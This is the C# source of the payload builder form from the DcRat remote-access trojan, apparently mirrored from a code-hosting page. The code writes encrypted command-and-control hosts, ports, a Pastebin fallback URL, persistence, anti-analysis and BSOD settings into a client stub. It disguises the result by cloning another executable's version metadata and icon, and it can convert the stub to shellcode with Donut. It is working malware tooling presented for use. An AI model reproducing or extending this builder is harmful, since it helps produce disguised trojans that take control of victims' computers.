mirror of https://github.com/qwqdanchun/DcRat.git
555 lines
23 KiB
C#
555 lines
23 KiB
C#
using System;
|
|
using System.Windows.Forms;
|
|
using Server.Helper;
|
|
using System.Text;
|
|
using System.Security.Cryptography;
|
|
using Server.Algorithm;
|
|
using System.Security.Cryptography.X509Certificates;
|
|
using System.Collections.Generic;
|
|
using Vestris.ResourceLib;
|
|
using dnlib.DotNet;
|
|
using System.IO;
|
|
using System.Linq;
|
|
using dnlib.DotNet.Emit;
|
|
using System.Threading.Tasks;
|
|
using System.Diagnostics;
|
|
using Toolbelt.Drawing;
|
|
using Server.Helper.Donut;
|
|
|
|
namespace Server.Forms
|
|
{
|
|
public partial class FormBuilder : Form
|
|
{
|
|
public FormBuilder()
|
|
{
|
|
InitializeComponent();
|
|
}
|
|
|
|
private void SaveSettings()
|
|
{
|
|
try
|
|
{
|
|
List<string> Pstring = new List<string>();
|
|
foreach (string port in listBoxPort.Items)
|
|
{
|
|
Pstring.Add(port);
|
|
}
|
|
Properties.Settings.Default.Ports = string.Join(",", Pstring);
|
|
|
|
List<string> IPstring = new List<string>();
|
|
foreach (string ip in listBoxIP.Items)
|
|
{
|
|
IPstring.Add(ip);
|
|
}
|
|
Properties.Settings.Default.IP = string.Join(",", IPstring);
|
|
|
|
Properties.Settings.Default.Save();
|
|
}
|
|
catch { }
|
|
}
|
|
|
|
private void checkBox1_CheckedChanged(object sender, EventArgs e)
|
|
{
|
|
if (checkBox1.Checked)
|
|
{
|
|
checkBox1.Text = "ON";
|
|
textFilename.Enabled = true;
|
|
comboBoxFolder.Enabled = true;
|
|
}
|
|
else
|
|
{
|
|
checkBox1.Text = "OFF";
|
|
textFilename.Enabled = false;
|
|
comboBoxFolder.Enabled = false;
|
|
}
|
|
}
|
|
|
|
private void Builder_Load(object sender, EventArgs e)
|
|
{
|
|
comboBoxFolder.SelectedIndex = 0;
|
|
if (Properties.Settings.Default.IP.Length == 0)
|
|
listBoxIP.Items.Add("127.0.0.1");
|
|
|
|
if (Properties.Settings.Default.Paste_bin.Length == 0)
|
|
txtPaste_bin.Text = "https://Pastebin.com/raw/fevFJe98";
|
|
|
|
try
|
|
{
|
|
string[] ports = Properties.Settings.Default.Ports.Split(new[] { "," }, StringSplitOptions.None);
|
|
foreach (string item in ports)
|
|
{
|
|
if (!string.IsNullOrWhiteSpace(item))
|
|
listBoxPort.Items.Add(item.Trim());
|
|
}
|
|
}
|
|
catch { }
|
|
|
|
try
|
|
{
|
|
string[] ip = Properties.Settings.Default.IP.Split(new[] { "," }, StringSplitOptions.None);
|
|
foreach (string item in ip)
|
|
{
|
|
if (!string.IsNullOrWhiteSpace(item))
|
|
listBoxIP.Items.Add(item.Trim());
|
|
}
|
|
}
|
|
catch { }
|
|
|
|
if (Properties.Settings.Default.Mutex.Length == 0)
|
|
txtMutex.Text = getRandomCharacters();
|
|
}
|
|
|
|
|
|
private void CheckBox2_CheckedChanged(object sender, EventArgs e)
|
|
{
|
|
if (chkPaste_bin.Checked)
|
|
{
|
|
txtPaste_bin.Enabled = true;
|
|
textIP.Enabled = false;
|
|
textPort.Enabled = false;
|
|
listBoxIP.Enabled = false;
|
|
listBoxPort.Enabled = false;
|
|
btnAddIP.Enabled = false;
|
|
btnAddPort.Enabled = false;
|
|
btnRemoveIP.Enabled = false;
|
|
btnRemovePort.Enabled = false;
|
|
}
|
|
else
|
|
{
|
|
txtPaste_bin.Enabled = false;
|
|
textIP.Enabled = true;
|
|
textPort.Enabled = true;
|
|
listBoxIP.Enabled = true;
|
|
listBoxPort.Enabled = true;
|
|
btnAddIP.Enabled = true;
|
|
btnAddPort.Enabled = true;
|
|
btnRemoveIP.Enabled = true;
|
|
btnRemovePort.Enabled = true;
|
|
}
|
|
}
|
|
|
|
private void BtnRemovePort_Click(object sender, EventArgs e)
|
|
{
|
|
if (listBoxPort.SelectedItems.Count == 1)
|
|
{
|
|
listBoxPort.Items.Remove(listBoxPort.SelectedItem);
|
|
}
|
|
}
|
|
|
|
private void BtnAddPort_Click(object sender, EventArgs e)
|
|
{
|
|
try
|
|
{
|
|
Convert.ToInt32(textPort.Text.Trim());
|
|
foreach (string item in listBoxPort.Items)
|
|
{
|
|
if (item.Equals(textPort.Text.Trim()))
|
|
return;
|
|
}
|
|
listBoxPort.Items.Add(textPort.Text.Trim());
|
|
textPort.Clear();
|
|
}
|
|
catch { }
|
|
}
|
|
|
|
private void BtnRemoveIP_Click(object sender, EventArgs e)
|
|
{
|
|
if (listBoxIP.SelectedItems.Count == 1)
|
|
{
|
|
listBoxIP.Items.Remove(listBoxIP.SelectedItem);
|
|
}
|
|
}
|
|
|
|
private void BtnAddIP_Click(object sender, EventArgs e)
|
|
{
|
|
try
|
|
{
|
|
foreach (string item in listBoxIP.Items)
|
|
{
|
|
textIP.Text = textIP.Text.Replace(" ", "");
|
|
if (item.Equals(textIP.Text))
|
|
return;
|
|
}
|
|
listBoxIP.Items.Add(textIP.Text.Replace(" ", ""));
|
|
textIP.Clear();
|
|
}
|
|
catch { }
|
|
}
|
|
|
|
private async void BtnBuild_Click(object sender, EventArgs e)
|
|
{
|
|
if (!chkPaste_bin.Checked && listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0) return;
|
|
|
|
if (checkBox1.Checked)
|
|
{
|
|
if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text)) return;
|
|
if (!textFilename.Text.EndsWith("exe")) textFilename.Text += ".exe";
|
|
}
|
|
|
|
if (string.IsNullOrWhiteSpace(txtMutex.Text)) txtMutex.Text = getRandomCharacters();
|
|
|
|
if (chkPaste_bin.Checked && string.IsNullOrWhiteSpace(txtPaste_bin.Text)) return;
|
|
|
|
|
|
|
|
ModuleDefMD asmDef = null;
|
|
try
|
|
{
|
|
using (asmDef = ModuleDefMD.Load(@"Stub/Client.exe"))
|
|
using (SaveFileDialog saveFileDialog1 = new SaveFileDialog())
|
|
{
|
|
saveFileDialog1.Filter = ".exe (*.exe)|*.exe";
|
|
saveFileDialog1.InitialDirectory = Application.StartupPath;
|
|
saveFileDialog1.OverwritePrompt = false;
|
|
saveFileDialog1.FileName = "Client";
|
|
if (saveFileDialog1.ShowDialog() == DialogResult.OK)
|
|
{
|
|
btnShellcode.Enabled = false;
|
|
btnBuild.Enabled = false;
|
|
WriteSettings(asmDef, saveFileDialog1.FileName);
|
|
asmDef.Write(saveFileDialog1.FileName);
|
|
asmDef.Dispose();
|
|
if (btnAssembly.Checked)
|
|
{
|
|
WriteAssembly(saveFileDialog1.FileName);
|
|
}
|
|
if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text))
|
|
{
|
|
IconInjector.InjectIcon(saveFileDialog1.FileName, txtIcon.Text);
|
|
}
|
|
MessageBox.Show("Done!", "Builder", MessageBoxButtons.OK, MessageBoxIcon.Information);
|
|
SaveSettings();
|
|
this.Close();
|
|
}
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
MessageBox.Show(ex.Message, "Builder", MessageBoxButtons.OK, MessageBoxIcon.Error);
|
|
asmDef?.Dispose();
|
|
btnBuild.Enabled = true;
|
|
|
|
}
|
|
}
|
|
|
|
private void WriteAssembly(string filename)
|
|
{
|
|
try
|
|
{
|
|
VersionResource versionResource = new VersionResource();
|
|
versionResource.LoadFrom(filename);
|
|
|
|
versionResource.FileVersion = txtFileVersion.Text;
|
|
versionResource.ProductVersion = txtProductVersion.Text;
|
|
versionResource.Language = 0;
|
|
|
|
StringFileInfo stringFileInfo = (StringFileInfo)versionResource["StringFileInfo"];
|
|
stringFileInfo["ProductName"] = txtProduct.Text;
|
|
stringFileInfo["FileDescription"] = txtDescription.Text;
|
|
stringFileInfo["CompanyName"] = txtCompany.Text;
|
|
stringFileInfo["LegalCopyright"] = txtCopyright.Text;
|
|
stringFileInfo["LegalTrademarks"] = txtTrademarks.Text;
|
|
stringFileInfo["Assembly Version"] = versionResource.ProductVersion;
|
|
stringFileInfo["InternalName"] = txtOriginalFilename.Text;
|
|
stringFileInfo["OriginalFilename"] = txtOriginalFilename.Text;
|
|
stringFileInfo["ProductVersion"] = versionResource.ProductVersion;
|
|
stringFileInfo["FileVersion"] = versionResource.FileVersion;
|
|
|
|
versionResource.SaveTo(filename);
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
throw new ArgumentException("Assembly: " + ex.Message);
|
|
}
|
|
}
|
|
|
|
private void BtnAssembly_CheckedChanged(object sender, EventArgs e)
|
|
{
|
|
if (btnAssembly.Checked)
|
|
{
|
|
btnClone.Enabled = true;
|
|
txtProduct.Enabled = true;
|
|
txtDescription.Enabled = true;
|
|
txtCompany.Enabled = true;
|
|
txtCopyright.Enabled = true;
|
|
txtTrademarks.Enabled = true;
|
|
txtOriginalFilename.Enabled = true;
|
|
txtOriginalFilename.Enabled = true;
|
|
txtProductVersion.Enabled = true;
|
|
txtFileVersion.Enabled = true;
|
|
}
|
|
else
|
|
{
|
|
btnClone.Enabled = false;
|
|
txtProduct.Enabled = false;
|
|
txtDescription.Enabled = false;
|
|
txtCompany.Enabled = false;
|
|
txtCopyright.Enabled = false;
|
|
txtTrademarks.Enabled = false;
|
|
txtOriginalFilename.Enabled = false;
|
|
txtOriginalFilename.Enabled = false;
|
|
txtProductVersion.Enabled = false;
|
|
txtFileVersion.Enabled = false;
|
|
}
|
|
}
|
|
|
|
private void ChkIcon_CheckedChanged(object sender, EventArgs e)
|
|
{
|
|
if (chkIcon.Checked)
|
|
{
|
|
txtIcon.Enabled = true;
|
|
btnIcon.Enabled = true;
|
|
}
|
|
else
|
|
{
|
|
txtIcon.Enabled = false;
|
|
btnIcon.Enabled = false;
|
|
}
|
|
}
|
|
|
|
private void BtnIcon_Click(object sender, EventArgs e)
|
|
{
|
|
using (OpenFileDialog ofd = new OpenFileDialog())
|
|
{
|
|
ofd.Title = "Choose Icon";
|
|
ofd.Filter = "Icons Files(*.exe;*.ico;)|*.exe;*.ico";
|
|
ofd.Multiselect = false;
|
|
if (ofd.ShowDialog() == DialogResult.OK)
|
|
{
|
|
if (ofd.FileName.ToLower().EndsWith(".exe"))
|
|
{
|
|
string ico = GetIcon(ofd.FileName);
|
|
txtIcon.Text = ico;
|
|
picIcon.ImageLocation = ico;
|
|
}
|
|
else
|
|
{
|
|
txtIcon.Text = ofd.FileName;
|
|
picIcon.ImageLocation = ofd.FileName;
|
|
}
|
|
}
|
|
}
|
|
}
|
|
|
|
private string GetIcon(string path)
|
|
{
|
|
try
|
|
{
|
|
string tempFile = Path.GetTempFileName() + ".ico";
|
|
using (FileStream fs = new FileStream(tempFile, FileMode.Create))
|
|
{
|
|
IconExtractor.Extract1stIconTo(path, fs);
|
|
}
|
|
return tempFile;
|
|
}
|
|
catch { }
|
|
return "";
|
|
}
|
|
|
|
private void WriteSettings(ModuleDefMD asmDef, string AsmName)
|
|
{
|
|
try
|
|
{
|
|
var key = Methods.GetRandomString(32);
|
|
var aes = new Aes256(key);
|
|
var caCertificate = new X509Certificate2(Settings.CertificatePath, "", X509KeyStorageFlags.Exportable);
|
|
var serverCertificate = new X509Certificate2(caCertificate.Export(X509ContentType.Cert));
|
|
byte[] signature;
|
|
using (var csp = (RSACryptoServiceProvider)caCertificate.PrivateKey)
|
|
{
|
|
var hash = Sha256.ComputeHash(Encoding.UTF8.GetBytes(key));
|
|
signature = csp.SignHash(hash, CryptoConfig.MapNameToOID("SHA256"));
|
|
}
|
|
|
|
foreach (TypeDef type in asmDef.Types)
|
|
{
|
|
asmDef.Assembly.Name = Path.GetFileNameWithoutExtension(AsmName);
|
|
asmDef.Name = Path.GetFileName(AsmName);
|
|
if (type.Name == "Settings")
|
|
foreach (MethodDef method in type.Methods)
|
|
{
|
|
if (method.Body == null) continue;
|
|
for (int i = 0; i < method.Body.Instructions.Count(); i++)
|
|
{
|
|
if (method.Body.Instructions[i].OpCode == OpCodes.Ldstr)
|
|
{
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Ports%")
|
|
{
|
|
if (chkPaste_bin.Enabled && chkPaste_bin.Checked)
|
|
{
|
|
method.Body.Instructions[i].Operand = aes.Encrypt("null");
|
|
}
|
|
else
|
|
{
|
|
List<string> LString = new List<string>();
|
|
foreach (string port in listBoxPort.Items)
|
|
{
|
|
LString.Add(port);
|
|
}
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(string.Join(",", LString));
|
|
}
|
|
}
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Hosts%")
|
|
{
|
|
if (chkPaste_bin.Enabled && chkPaste_bin.Checked)
|
|
{
|
|
method.Body.Instructions[i].Operand = aes.Encrypt("null");
|
|
}
|
|
else
|
|
{
|
|
List<string> LString = new List<string>();
|
|
foreach (string ip in listBoxIP.Items)
|
|
{
|
|
LString.Add(ip);
|
|
}
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(string.Join(",", LString));
|
|
}
|
|
}
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Install%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(checkBox1.Checked.ToString().ToLower());
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Folder%")
|
|
method.Body.Instructions[i].Operand = comboBoxFolder.Text;
|
|
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%File%")
|
|
method.Body.Instructions[i].Operand = textFilename.Text;
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Version%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(Settings.Version.Replace("DcRat ", ""));
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Key%")
|
|
method.Body.Instructions[i].Operand = Convert.ToBase64String(Encoding.UTF8.GetBytes(key));
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%MTX%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(txtMutex.Text);
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Anti%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(chkAnti.Checked.ToString().ToLower());
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%AntiProcess%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(chkAntiProcess.Checked.ToString().ToLower());
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Certificate%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(serverCertificate.Export(X509ContentType.Cert)));
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Serversignature%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(Convert.ToBase64String(signature));
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%BSOD%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(chkBsod.Checked.ToString().ToLower());
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Paste_bin%")
|
|
if (chkPaste_bin.Checked)
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(txtPaste_bin.Text);
|
|
else
|
|
method.Body.Instructions[i].Operand = aes.Encrypt("null");
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Delay%")
|
|
method.Body.Instructions[i].Operand = numDelay.Value.ToString();
|
|
|
|
if (method.Body.Instructions[i].Operand.ToString() == "%Group%")
|
|
method.Body.Instructions[i].Operand = aes.Encrypt(txtGroup.Text);
|
|
}
|
|
}
|
|
}
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
throw new ArgumentException("WriteSettings: " + ex.Message);
|
|
}
|
|
}
|
|
|
|
|
|
private readonly Random random = new Random();
|
|
const string alphabet = "asdfghjklqwertyuiopmnbvcxz";
|
|
|
|
public string getRandomCharacters()
|
|
{
|
|
var sb = new StringBuilder();
|
|
for (int i = 1; i <= new Random().Next(10, 20); i++)
|
|
{
|
|
var randomCharacterPosition = random.Next(0, alphabet.Length);
|
|
sb.Append(alphabet[randomCharacterPosition]);
|
|
}
|
|
return sb.ToString();
|
|
}
|
|
|
|
private void BtnClone_Click(object sender, EventArgs e)
|
|
{
|
|
using (var openFileDialog = new OpenFileDialog())
|
|
{
|
|
openFileDialog.Filter = "Executable (*.exe)|*.exe";
|
|
if (openFileDialog.ShowDialog() == DialogResult.OK)
|
|
{
|
|
var fileVersionInfo = FileVersionInfo.GetVersionInfo(openFileDialog.FileName);
|
|
|
|
txtOriginalFilename.Text = fileVersionInfo.InternalName ?? string.Empty;
|
|
txtDescription.Text = fileVersionInfo.FileDescription ?? string.Empty;
|
|
txtCompany.Text = fileVersionInfo.CompanyName ?? string.Empty;
|
|
txtProduct.Text = fileVersionInfo.ProductName ?? string.Empty;
|
|
txtCopyright.Text = fileVersionInfo.LegalCopyright ?? string.Empty;
|
|
txtTrademarks.Text = fileVersionInfo.LegalTrademarks ?? string.Empty;
|
|
|
|
var version = fileVersionInfo.FileMajorPart;
|
|
txtFileVersion.Text = $"{fileVersionInfo.FileMajorPart.ToString()}.{fileVersionInfo.FileMinorPart.ToString()}.{fileVersionInfo.FileBuildPart.ToString()}.{fileVersionInfo.FilePrivatePart.ToString()}";
|
|
txtProductVersion.Text = $"{fileVersionInfo.FileMajorPart.ToString()}.{fileVersionInfo.FileMinorPart.ToString()}.{fileVersionInfo.FileBuildPart.ToString()}.{fileVersionInfo.FilePrivatePart.ToString()}";
|
|
}
|
|
}
|
|
}
|
|
|
|
private void btnShellcode_Click(object sender, EventArgs e)
|
|
{
|
|
if (!chkPaste_bin.Checked && listBoxIP.Items.Count == 0 || listBoxPort.Items.Count == 0) return;
|
|
if (checkBox1.Checked)
|
|
{
|
|
if (string.IsNullOrWhiteSpace(textFilename.Text) || string.IsNullOrWhiteSpace(comboBoxFolder.Text)) return;
|
|
if (!textFilename.Text.EndsWith("exe")) textFilename.Text += ".exe";
|
|
}
|
|
if (string.IsNullOrWhiteSpace(txtMutex.Text)) txtMutex.Text = getRandomCharacters();
|
|
if (chkPaste_bin.Checked && string.IsNullOrWhiteSpace(txtPaste_bin.Text)) return;
|
|
ModuleDefMD asmDef = null;
|
|
try
|
|
{
|
|
using (asmDef = ModuleDefMD.Load(@"Stub/Client.exe"))
|
|
{
|
|
string Temppath = Path.Combine(Application.StartupPath, @"Stub\tempClient.exe"); ;
|
|
if (File.Exists(Temppath))
|
|
{
|
|
File.Delete(Temppath);
|
|
}
|
|
|
|
File.Copy(Path.Combine(Application.StartupPath, @"Stub\Client.exe"), Temppath);
|
|
btnShellcode.Enabled = false;
|
|
btnBuild.Enabled = false;
|
|
WriteSettings(asmDef, Temppath);
|
|
asmDef.Write(Temppath);
|
|
asmDef.Dispose();
|
|
if (btnAssembly.Checked)
|
|
{
|
|
WriteAssembly(Temppath);
|
|
}
|
|
if (chkIcon.Checked && !string.IsNullOrEmpty(txtIcon.Text))
|
|
{
|
|
IconInjector.InjectIcon(Temppath, txtIcon.Text);
|
|
}
|
|
Donut.Creat(Temppath);
|
|
File.Delete(Temppath);
|
|
MessageBox.Show("Done!", "Builder", MessageBoxButtons.OK, MessageBoxIcon.Information);
|
|
SaveSettings();
|
|
this.Close();
|
|
}
|
|
}
|
|
catch (Exception ex)
|
|
{
|
|
MessageBox.Show(ex.Message, "Builder", MessageBoxButtons.OK, MessageBoxIcon.Error);
|
|
asmDef?.Dispose();
|
|
btnBuild.Enabled = true;
|
|
|
|
}
|
|
}
|
|
}
|
|
} |